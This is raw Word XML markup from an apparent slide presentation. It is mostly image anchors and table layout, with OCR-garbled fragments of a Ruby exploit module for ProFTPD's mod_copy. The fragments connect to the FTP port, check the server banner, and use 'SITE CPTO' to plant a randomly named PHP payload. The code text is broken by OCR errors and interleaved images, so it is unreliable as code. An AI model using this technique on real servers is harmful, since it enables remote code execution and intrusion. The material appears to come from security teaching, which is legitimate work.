          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251696128" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="0" wp14:anchorId="3569830B" wp14:editId="2BD50800">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>0</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>781050</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="12192000" cy="6076950"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="340777" name="Picture 34077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777" name="Picture 340777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12192000" cy="60769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br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E278B2C" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="-1440" w:right="17760"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251697152" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="0" wp14:anchorId="26A0BB06" wp14:editId="7F33928B">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>0</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>781050</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="12192000" cy="6076950"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="340779" name="Picture 34077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779" name="Picture 340779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12192000" cy="60769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br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E130042" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="-1440" w:right="17760"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251698176" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="0" wp14:anchorId="7889D5A1" wp14:editId="5AD57A7F">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>0</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>781050</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="12192000" cy="6076950"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="340781" name="Picture 34078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781" name="Picture 340781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12192000" cy="60769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9FDC5B0" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="007A5F0C">
      <w:pPr>
        <w:sectPr w:rsidR="007A5F0C">
          <w:headerReference w:type="even" r:id="rId103"/>
          <w:headerReference w:type="default" r:id="rId104"/>
          <w:footerReference w:type="even" r:id="rId105"/>
          <w:footerReference w:type="default" r:id="rId106"/>
          <w:headerReference w:type="first" r:id="rId107"/>
          <w:footerReference w:type="first" r:id="rId108"/>
          <w:pgSz w:w="19200" w:h="10800" w:orient="landscape"/>
          <w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="233" w:footer="1110" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37959F05" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="007A5F0C">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="-1440" w:right="17760"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="17436" w:type="dxa"/>
        <w:tblInd w:w="-461" w:type="dxa"/>
        <w:tblCellMar>
          <w:top w:w="98" w:type="dxa"/>
          <w:left w:w="53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628"/>
        <w:gridCol w:w="17033"/>
      </w:tblGrid>
      <w:tr w:rsidR="007A5F0C" w14:paraId="6273B312" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="504"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="829" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="0202517F" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="007A5F0C"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="16607" w:type="dxa"/>
            <w:vMerge w:val="restar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2DFD1DF9" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="795" w:right="6429" w:hanging="660"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="38"/>
              </w:rPr>
              <w:t>def exploit ftp_port = datastore[ ' RPORT_FTP' get_arg = rand_text_alphanumeric(5+rand(3)) payload_name = rand_text_alphanumeric(5+rand(3)) + ' .php'</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007A5F0C" w14:paraId="32B327E9" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="840"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="829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vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0BA9B3AD" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="199"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="74"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="000000"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="085EAA2D" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="007A5F0C"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007A5F0C" w14:paraId="62AD467B" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="450"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="829" w:type="dxa"/>
            <w:vMerge w:val="restart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</w:tcPr>
          <w:p w14:paraId="1E0EEBE4" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="007A5F0C"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vMerge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D7C3FED" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="007A5F0C"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007A5F0C" w14:paraId="2430EB1D" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="1650"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="2C75BF4A" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="007A5F0C"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="16607" w:type="dxa"/>
            <w:vMerge w:val="restar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bottom"/>
          </w:tcPr>
          <w:p w14:paraId="3C385539" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:spacing w:after="0" w:line="216" w:lineRule="auto"/>
              <w:ind w:left="795" w:right="3294" w:firstLine="15"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="38"/>
              </w:rPr>
              <w:t xml:space="preserve">sock = Rex: : Socket. </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4AC94176" wp14:editId="25E13837">
                  <wp:extent cx="752475" cy="161925"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="173882" name="Picture 17388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3882" name="Picture 173882"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId10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2475" cy="161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38"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4C36627B" wp14:editId="5D6CF3FB">
                  <wp:extent cx="85725" cy="95250"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="173783" name="Picture 17378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3783" name="Picture 173783"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId1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725" cy="95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38"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="37D8C238" wp14:editId="119FB69D">
                  <wp:extent cx="85725" cy="133350"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="173782" name="Picture 17378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3782" name="Picture 173782"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId1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725" cy="133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38"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="372D5776" wp14:editId="61812D12">
                  <wp:extent cx="57150" cy="180975"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="173781" name="Picture 17378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3781" name="Picture 173781"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId1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150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38"/>
              </w:rPr>
              <w:t xml:space="preserve">'PeerHost' </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="38"/>
              </w:rPr>
              <w:tab/>
              <w:t>rhost, ' PeerPort '</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="38"/>
              </w:rPr>
              <w:tab/>
              <w:t>ftp_port) if sock. nil?</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="582A2F4B" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="center" w:pos="3653"/>
                <w:tab w:val="center" w:pos="11333"/>
              </w:tabs>
              <w:spacing w:after="178"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="42"/>
              </w:rPr>
              <w:tab/>
              <w:t>fail_with(Fai1ure: : Unreachable,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="42"/>
              </w:rPr>
              <w:tab/>
              <w:t>rhost} :</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="33AAF843" wp14:editId="4102EB52">
                  <wp:extent cx="1143000" cy="171450"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="173883" name="Picture 17388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3883" name="Picture 173883"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId8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0" cy="171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42"/>
              </w:rPr>
              <w:t xml:space="preserve"> - Failed to connect to FTP server")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="656523F0" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:spacing w:after="514" w:line="227" w:lineRule="auto"/>
              <w:ind w:left="795" w:right="4794" w:firstLine="330"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="34"/>
              </w:rPr>
              <w:t>print_ status( rhost}</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="280A7F7C" wp14:editId="35C97198">
                  <wp:extent cx="1209675" cy="171450"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="173884" name="Picture 17388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3884" name="Picture 173884"/>
                          <pic:cNvPicPr/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9675" cy="171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34"/>
              </w:rPr>
              <w:t xml:space="preserve"> - Connected to FTP server") end</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7420AA44" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="795" w:right="639" w:firstLine="15"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="42"/>
              </w:rPr>
              <w:t xml:space="preserve">res = sock. </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0C179AE1" wp14:editId="009D683C">
                  <wp:extent cx="1152525" cy="180975"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="173885" name="Picture 17388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3885" name="Picture 173885"/>
                          <pic:cNvPicPr/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2525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42"/>
              </w:rPr>
              <w:t xml:space="preserve"> le) unless res &amp;&amp; res. include? ('220' ) fail_with</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="42"/>
              </w:rPr>
              <w:t xml:space="preserve">(Fai1ure: : Unknown, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="31B465A5" wp14:editId="70AC25FC">
                  <wp:extent cx="2171700" cy="171450"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="173886" name="Picture 17388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3886" name="Picture 173886"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId1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71700" cy="171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42"/>
              </w:rPr>
              <w:t xml:space="preserve"> - Failure retrieving ProFTPD OK banner") end</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007A5F0C" w14:paraId="75650EEE" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="2490"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="829" w:type="dxa"/>
            <w:vMerge w:val="restart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</w:tcPr>
          <w:p w14:paraId="03B88D7B" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="199"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="72"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vMerge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A186845" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="007A5F0C"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007A5F0C" w14:paraId="547773BE" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="1084"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="40FAC7EE" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="007A5F0C"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="16607" w:type="dxa"/>
            <w:vMerge w:val="restar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FD4DEE2" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:right="-426"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="173A1EFC" wp14:editId="2BC3711B">
                  <wp:extent cx="10782300" cy="2066925"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="340783" name="Picture 34078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0783" name="Picture 340783"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId1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782300" cy="2066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A5F0C" w14:paraId="13D55819" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="836"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="82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05A032BE" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="199"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="72"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="000000"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="6DC75A05" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="007A5F0C"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007A5F0C" w14:paraId="29AD616F" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="1078"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="829" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="000000"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="7AA1684F" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="007A5F0C"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vMerge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D2B8581" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="007A5F0C"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007A5F0C" w14:paraId="2F42C846" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="54"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="7B7FA24F" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="007A5F0C"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="16607" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="000000"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="6A82995F" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="007A5F0C"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3009FB73" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="-1440" w:right="17760"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251699200" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="0" wp14:anchorId="03D6DE32" wp14:editId="6516DF48">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>0</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>781050</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="12192000" cy="6076950"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="340785" name="Picture 34078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785" name="Picture 340785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12192000" cy="60769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br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A003256" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="-1440" w:right="17760"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251700224" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="0" wp14:anchorId="3980B30F" wp14:editId="1962217D">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>0</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>781050</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="12192000" cy="6076950"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="340787" name="Picture 34078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787" name="Picture 340787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12192000" cy="60769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br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4497D2A0" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="-1440" w:right="17760"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251701248" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="0" wp14:anchorId="64AB867C" wp14:editId="2353273A">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>0</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>781050</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="12192000" cy="6076950"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="340789" name="Picture 34078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789" name="Picture 340789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12192000" cy="60769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F78259C" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="007A5F0C">
      <w:pPr>
        <w:sectPr w:rsidR="007A5F0C">
          <w:headerReference w:type="even" r:id="rId118"/>
          <w:headerReference w:type="default" r:id="rId119"/>
          <w:footerReference w:type="even" r:id="rId120"/>
          <w:footerReference w:type="default" r:id="rId121"/>
          <w:headerReference w:type="first" r:id="rId122"/>
          <w:footerReference w:type="first" r:id="rId123"/>
          <w:pgSz w:w="19200" w:h="10800" w:orient="landscape"/>
          <w:pgMar w:top="1348" w:right="1440" w:bottom="480" w:left="1440" w:header="156" w:footer="720" w:gutter="0"/>
          <w:cols w:space="720"/>
          <w:titlePg/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblpPr w:vertAnchor="text" w:tblpX="-600" w:tblpY="-6036"/>
        <w:tblOverlap w:val="never"/>
        <w:tblW w:w="17499" w:type="dxa"/>
        <w:tblInd w:w="0" w:type="dxa"/>
        <w:tblCellMar>
          <w:top w:w="202" w:type="dxa"/>
          <w:left w:w="0" w:type="dxa"/>
          <w:bottom w:w="0" w:type="dxa"/>
          <w:right w:w="211" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="915"/>
        <w:gridCol w:w="9390"/>
        <w:gridCol w:w="7194"/>
      </w:tblGrid>
      <w:tr w:rsidR="007A5F0C" w14:paraId="367E351F" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="688"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="915" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="0F479137" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="007A5F0C"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9390" w:type="dxa"/>
            <w:vMerge w:val="restar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vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="479A9FA8" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:spacing w:after="30" w:line="216" w:lineRule="auto"/>
              <w:ind w:left="810"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="32"/>
              </w:rPr>
              <w:t xml:space="preserve">sock. put( "SITE CPTO </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="32"/>
              </w:rPr>
              <w:tab/>
              <w:t xml:space="preserve">'TMPPATH' </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="32"/>
              </w:rPr>
              <w:tab/>
              <w:t xml:space="preserve">.&lt;?php res = sock. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="11EBBE1C" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="795" w:right="1079"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="40"/>
              </w:rPr>
              <w:t xml:space="preserve">unless res &amp;&amp; res. include? ('250' ) fail_with(Fai1ure: : Unknown, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4814B04A" wp14:editId="5CBBE704">
                  <wp:extent cx="1485900" cy="171450"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="202175" name="Picture 20217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2175" name="Picture 202175"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId1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5900" cy="171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40"/>
              </w:rPr>
              <w:t>end</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7194" w:type="dxa"/>
            <w:vMerge w:val="restart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</w:tcPr>
          <w:p w14:paraId="1BE8F5FE" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="center" w:pos="4020"/>
                <w:tab w:val="center" w:pos="4185"/>
                <w:tab w:val="center" w:pos="5325"/>
              </w:tabs>
              <w:spacing w:after="381"/>
              <w:ind w:left="-180"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2F9A6004" wp14:editId="506251F1">
                  <wp:extent cx="2600325" cy="180975"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="202225" name="Picture 20222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2225" name="Picture 202225"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId1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00325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ab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="66EE783E" wp14:editId="6587DFBA">
                  <wp:extent cx="95250" cy="133350"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="202178" name="Picture 20217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2178" name="Picture 202178"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
